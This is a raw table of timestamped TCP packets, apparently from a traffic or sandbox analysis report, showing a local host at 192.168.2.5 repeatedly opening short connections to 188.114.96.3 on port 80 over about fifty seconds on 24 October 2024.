                                      Oct 24, 2024 17:03:06.084038973 CEST8049983188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:06.084101915 CEST4998380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:06.088782072 CEST8049983188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:06.219249964 CEST4998780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:06.224769115 CEST8049987188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:06.224879980 CEST4998780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:06.226603031 CEST4998780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:06.232148886 CEST8049987188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:06.232215881 CEST4998780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:06.237970114 CEST8049987188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:07.269582033 CEST8049987188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:07.269901991 CEST4998780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:07.271019936 CEST8049987188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:07.271081924 CEST4998780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:07.280783892 CEST8049987188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:07.405340910 CEST4999080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:07.411078930 CEST8049990188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:07.411170006 CEST4999080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:07.412898064 CEST4999080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:07.418430090 CEST8049990188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:07.418539047 CEST4999080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:07.424130917 CEST8049990188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:08.761451006 CEST8049990188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:08.761558056 CEST4999080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:08.764221907 CEST8049990188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:08.764281988 CEST4999080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:08.767098904 CEST8049990188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:08.905703068 CEST4999580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:08.911619902 CEST8049995188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:08.911731005 CEST4999580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:08.914410114 CEST4999580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:08.919785023 CEST8049995188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:08.919859886 CEST4999580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:08.925288916 CEST8049995188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:11.602705002 CEST8049995188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:11.602828979 CEST4999580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:11.604887009 CEST8049995188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:11.604948997 CEST4999580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:11.609452963 CEST8049995188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:11.763237953 CEST5000280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:11.768953085 CEST8050002188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:11.769036055 CEST5000280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:11.772185087 CEST5000280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:11.777674913 CEST8050002188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:11.777745008 CEST5000280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:11.783238888 CEST8050002188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:15.147119999 CEST8050002188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:15.147284031 CEST5000280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:15.148057938 CEST8050002188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:15.148121119 CEST5000280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:15.153009892 CEST8050002188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:15.294817924 CEST5001080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:15.302089930 CEST8050010188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:15.302201986 CEST5001080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:15.303961992 CEST5001080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:15.309979916 CEST8050010188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:15.310030937 CEST5001080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:15.315538883 CEST8050010188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:16.206479073 CEST8050010188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:16.206577063 CEST5001080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:16.208772898 CEST8050010188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:16.208823919 CEST5001080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:16.212369919 CEST8050010188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:16.339648008 CEST5001380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:16.345279932 CEST8050013188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:16.345459938 CEST5001380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:16.347213030 CEST5001380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:16.352617979 CEST8050013188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:16.352682114 CEST5001380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:16.358143091 CEST8050013188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:17.263499022 CEST8050013188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:17.263597012 CEST5001380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:17.265630960 CEST8050013188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:17.265682936 CEST5001380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:17.269422054 CEST8050013188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:17.405097961 CEST5001980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:17.411833048 CEST8050019188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:17.411936998 CEST5001980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:17.413908958 CEST5001980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:17.420254946 CEST8050019188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:17.420331001 CEST5001980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:17.425986052 CEST8050019188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:18.463715076 CEST8050019188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:18.465527058 CEST8050019188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:18.465605974 CEST5001980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:18.475212097 CEST5001980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:18.480623960 CEST8050019188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:18.606939077 CEST5002280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:18.612728119 CEST8050022188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:18.612832069 CEST5002280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:18.614675999 CEST5002280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:18.620148897 CEST8050022188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:18.620368958 CEST5002280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:18.625885963 CEST8050022188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:19.665740013 CEST8050022188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:19.665854931 CEST5002280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:19.669122934 CEST8050022188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:19.669183969 CEST5002280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:19.671515942 CEST8050022188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:19.816500902 CEST5002380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:19.822324038 CEST8050023188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:19.822418928 CEST5002380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:19.824379921 CEST5002380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:19.829727888 CEST8050023188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:19.829824924 CEST5002380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:19.835505009 CEST8050023188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:20.770615101 CEST8050023188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:20.770740032 CEST5002380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:20.773505926 CEST8050023188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:20.773572922 CEST5002380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:20.776247978 CEST8050023188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:20.909378052 CEST5002480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:20.915057898 CEST8050024188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:20.915148020 CEST5002480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:20.917121887 CEST5002480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:20.922571898 CEST8050024188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:20.922651052 CEST5002480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:20.927978992 CEST8050024188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:21.809870958 CEST8050024188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:21.810045958 CEST5002480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:21.811587095 CEST8050024188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:21.811656952 CEST5002480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:21.815599918 CEST8050024188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:21.958811998 CEST5002580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:21.964525938 CEST8050025188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:21.964607000 CEST5002580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:21.966496944 CEST5002580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:21.973083973 CEST8050025188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:21.973153114 CEST5002580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:21.979825020 CEST8050025188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:23.173033953 CEST8050025188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:23.173240900 CEST5002580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:23.175570965 CEST8050025188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:23.175632954 CEST5002580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:23.178817987 CEST8050025188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:23.312453032 CEST5002680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:23.318016052 CEST8050026188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:23.318120956 CEST5002680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:23.319847107 CEST5002680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:23.325551033 CEST8050026188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:23.325611115 CEST5002680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:23.331168890 CEST8050026188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:24.271332979 CEST8050026188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:24.271557093 CEST5002680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:24.273581028 CEST8050026188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:24.273638964 CEST5002680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:24.277018070 CEST8050026188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:24.408117056 CEST5002780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:24.414001942 CEST8050027188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:24.414104939 CEST5002780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:24.415819883 CEST5002780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:24.421417952 CEST8050027188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:24.421551943 CEST5002780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:24.427033901 CEST8050027188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:26.405299902 CEST8050027188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:26.405617952 CEST5002780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:26.408942938 CEST8050027188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:26.409012079 CEST5002780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:26.411089897 CEST8050027188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:26.557508945 CEST5002880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:26.563127995 CEST8050028188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:26.563227892 CEST5002880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:26.566142082 CEST5002880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:26.571599007 CEST8050028188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:26.571665049 CEST5002880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:26.578181982 CEST8050028188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:29.670588970 CEST8050028188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:29.670903921 CEST5002880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:29.672871113 CEST8050028188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:29.672936916 CEST5002880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:29.677638054 CEST8050028188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:29.828085899 CEST5002980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:29.946113110 CEST8050029188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:29.946271896 CEST5002980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:29.949460983 CEST5002980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:29.956207037 CEST8050029188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:29.956285000 CEST5002980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:29.962996006 CEST8050029188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:30.974685907 CEST8050029188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:30.974836111 CEST5002980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:30.976142883 CEST8050029188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:30.976197958 CEST5002980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:30.980283022 CEST8050029188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:31.115200043 CEST5003080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:31.123058081 CEST8050030188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:31.123183966 CEST5003080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:31.126353025 CEST5003080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:31.134687901 CEST8050030188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:31.134751081 CEST5003080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:31.142592907 CEST8050030188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:32.096904039 CEST8050030188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:32.097070932 CEST5003080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:32.099083900 CEST8050030188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:32.099131107 CEST5003080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:32.103056908 CEST8050030188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:32.248470068 CEST5003180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:32.254194021 CEST8050031188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:32.254358053 CEST5003180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:32.256139040 CEST5003180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:32.261820078 CEST8050031188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:32.261893034 CEST5003180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:32.267545938 CEST8050031188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:33.257147074 CEST8050031188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:33.257287025 CEST5003180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:33.259617090 CEST8050031188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:33.259677887 CEST5003180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:33.262857914 CEST8050031188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:33.451625109 CEST5003280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:33.457848072 CEST8050032188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:33.458000898 CEST5003280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:33.459758997 CEST5003280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:33.465616941 CEST8050032188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:33.465688944 CEST5003280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:33.471265078 CEST8050032188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:34.906884909 CEST8050032188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:34.907114983 CEST5003280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:34.910129070 CEST8050032188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:34.910187960 CEST5003280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:34.913153887 CEST8050032188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:35.045720100 CEST5003380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:35.051712990 CEST8050033188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:35.051800966 CEST5003380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:35.053550005 CEST5003380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:35.059216022 CEST8050033188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:35.059299946 CEST5003380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:35.064855099 CEST8050033188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:36.731468916 CEST8050033188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:36.731689930 CEST5003380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:36.734040022 CEST8050033188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:36.734102011 CEST5003380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:36.737557888 CEST8050033188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:36.874309063 CEST5003480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:36.879828930 CEST8050034188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:36.879925013 CEST5003480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:36.881917953 CEST5003480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:36.887252092 CEST8050034188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:36.887346983 CEST5003480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:36.892798901 CEST8050034188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:38.767467022 CEST8050034188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:38.767571926 CEST5003480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:38.769318104 CEST8050034188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:38.769375086 CEST5003480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:38.773123980 CEST8050034188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:38.908828020 CEST5003580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:38.914343119 CEST8050035188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:38.914412022 CEST5003580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:38.916393995 CEST5003580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:38.921791077 CEST8050035188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:38.921832085 CEST5003580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:38.927814960 CEST8050035188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:40.378551006 CEST8050035188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:40.378664970 CEST5003580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:40.379678011 CEST8050035188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:40.379731894 CEST5003580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:40.384388924 CEST8050035188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:40.514801025 CEST5003680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:40.521003008 CEST8050036188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:40.521090984 CEST5003680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:40.522819996 CEST5003680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:40.765352964 CEST5003680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:40.811348915 CEST8050036188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:40.811371088 CEST8050036188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:40.811482906 CEST5003680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:40.817619085 CEST8050036188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:41.723603010 CEST8050036188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:41.723871946 CEST5003680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:41.726599932 CEST8050036188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:41.726679087 CEST5003680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:41.729284048 CEST8050036188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:41.868463039 CEST5003780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:41.875293016 CEST8050037188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:41.875438929 CEST5003780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:41.877525091 CEST5003780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:41.883179903 CEST8050037188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:41.883239985 CEST5003780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:41.889024973 CEST8050037188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:43.222179890 CEST8050037188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:43.222325087 CEST5003780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:43.224864960 CEST8050037188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:43.224936962 CEST5003780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:43.227866888 CEST8050037188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:43.362646103 CEST5003880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:43.368315935 CEST8050038188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:43.368443966 CEST5003880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:43.370507002 CEST5003880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:43.376054049 CEST8050038188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:43.376183987 CEST5003880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:43.381587029 CEST8050038188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:44.266699076 CEST8050038188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:44.266808987 CEST5003880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:44.268152952 CEST8050038188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:44.268208027 CEST5003880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:44.272391081 CEST8050038188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:44.463329077 CEST5003980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:44.469194889 CEST8050039188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:44.469367027 CEST5003980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:44.471126080 CEST5003980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:44.476594925 CEST8050039188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:44.476667881 CEST5003980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:44.482093096 CEST8050039188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:45.899514914 CEST8050039188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:45.899764061 CEST5003980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:45.902086973 CEST8050039188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:45.902169943 CEST5003980192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:45.907115936 CEST8050039188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:46.066220999 CEST5004080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:46.072844982 CEST8050040188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:46.072949886 CEST5004080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:46.075936079 CEST5004080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:46.083482027 CEST8050040188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:46.083585024 CEST5004080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:46.091187954 CEST8050040188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:49.446890116 CEST8050040188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:49.447134972 CEST5004080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:49.449605942 CEST8050040188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:49.449680090 CEST5004080192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:49.452542067 CEST8050040188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:49.591639042 CEST5004180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:49.597208977 CEST8050041188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:49.597332954 CEST5004180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:49.599083900 CEST5004180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:49.605381966 CEST8050041188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:49.605447054 CEST5004180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:49.610898972 CEST8050041188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:51.258519888 CEST8050041188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:51.258796930 CEST5004180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:51.259748936 CEST8050041188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:51.259848118 CEST5004180192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:51.264590979 CEST8050041188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:51.407011032 CEST5004280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:51.412539005 CEST8050042188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:51.412636042 CEST5004280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:51.414366961 CEST5004280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:51.419656038 CEST8050042188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:51.419744015 CEST5004280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:51.425148964 CEST8050042188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:52.944350958 CEST8050042188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:52.944484949 CEST8050042188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:52.944498062 CEST8050042188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:52.944528103 CEST5004280192.168.2.5188.114.96.3
